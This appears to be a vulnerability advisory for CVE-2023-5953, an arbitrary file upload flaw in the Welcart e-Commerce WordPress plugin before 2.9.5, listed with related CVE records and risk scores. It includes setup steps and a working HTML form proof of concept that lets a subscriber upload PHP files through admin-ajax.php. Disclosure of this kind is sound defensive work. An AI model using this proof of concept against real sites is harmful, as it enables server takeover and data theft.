Lucene search
BenachiWPEX-ID:6D29BA12-F14A-4CEE-BAAE-A6049D83BCE6HistoryNov 10, 2023 - 12:00 a.m.
Welcart e-Commerce < 2.9.5 - Subscriber+ Arbitrary File Upload
2023-11-1000:00:00
Benachi
26
arbitrary file upload
settlement settings
γ»γγ₯γͺγγ£
php file
admin-ajax.php
certificate upload
Description The plugin does not validate files to be uploaded, as well as does not have authorisation and CSRF in an AJAX action handling such upload. As a result, any authenticated users, such as subscriber could upload arbitrary files, such as PHP on the server
Setup (As admin):
- Go the the Settlement Settings ad drag the "γγ€γΈγ§γ³γ" module to the 'Settlement modules in use' section, then click the update button
- Setup the module and upload a certificate
Attack (as a subscriber), login to the blog, open a page with the code below and select a PHP file:
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="text" name="action" value="upload_certificate_file"/>
<input type="file" name="upfile"/>
<input type="submit" value="submit"/>
</form>
</body>
This will upload the php file to the uploads/xxxxx/ folderRelated
cve
cve
CVE-2023-5953
2023-12-04 22:15:08
cvelist
cvelist
CVE-2023-5953 Welcart e-Commerce < 2.9.5 - Subscriber+ Arbitrary File Upload
2023-12-04 21:28:03
wpvulndb
wpvulndb
Welcart e-Commerce < 2.9.5 - Subscriber+ Arbitrary File Upload
2023-11-10 00:00:00
prion
prion
Cross site request forgery (csrf)
2023-12-04 22:15:00
nvd
nvd
CVE-2023-5953
2023-12-04 22:15:08
7.4 High
AI Score
Confidence
Low
0.001 Low
EPSS
Percentile
19.3%
Related for WPEX-ID:6D29BA12-F14A-4CEE-BAAE-A6049D83BCE6